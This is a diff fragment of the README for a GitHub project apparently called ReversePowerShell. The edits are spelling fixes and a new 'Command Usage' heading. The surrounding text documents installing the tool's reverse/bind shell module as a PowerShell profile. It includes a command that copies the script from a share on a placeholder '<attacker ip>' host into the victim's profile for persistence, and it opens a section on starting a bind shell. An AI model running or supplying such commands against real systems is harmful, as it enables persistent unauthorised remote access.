tobor88/ReversePowerShell/README.md

 # OR
 #    - C:\Users\<username>\OneDrive\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
 #
-# Write-Verbose "Turning this module into the PowerShell profile will import all of the commands everytime the executing user opens a PowerShell session.
-This means you will need to open a new powershell session after doing this in order to access the commands.
+# Write-Verbose "Turning this module into the PowerShell profile will import all of the commands every time the executing user opens a PowerShell session.
+This means you will need to open a new PowerShell session after doing this in order to access the commands.
 I assume this can be done by just executing the "powershell" command though you may need to have a new window opened or new reverse/bind shell opened.
 You can also just reload the profile
 cmd /c 'copy \\<attacker ip>\MyShare\ReversePowerShell.ps1 $env:USERPROFILE\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.psm1

 powershell.exe
 # If that does not work try reloading the user profile.
 & $PROFILE
 ```

+# Command Usage:

 #### START BIND SHELL
 The below command can be executed to start a bind shell that connects the defined port to PowerShell.